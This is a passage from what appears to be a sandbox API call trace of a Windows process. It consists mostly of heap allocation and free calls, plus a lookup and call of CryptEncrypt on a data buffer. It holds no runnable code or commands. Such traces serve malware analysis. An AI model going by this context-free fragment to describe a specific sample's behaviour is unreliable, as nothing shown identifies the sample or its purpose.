hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0222.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0222.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f45560 [0222.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2e80330 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f45560 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0222.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.655] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0222.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0222.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8343) returned 0x2f45560 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f45560 | out: hHeap=0x970000) returned 1 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3be0e78 [0222.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0222.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0222.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0222.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0222.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0222.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0222.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0222.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51340 [0222.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51340, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.663] CryptEncrypt (in: hKey=0xa87710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3d210*, pdwDataLen=0x8cef60*=0x8343, dwBufLen=0x8348 | out: pbData=0x2f3d210*, pdwDataLen=0x8cef60*=0x8348) returned 1 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0222.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0222.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0222.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0222.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, 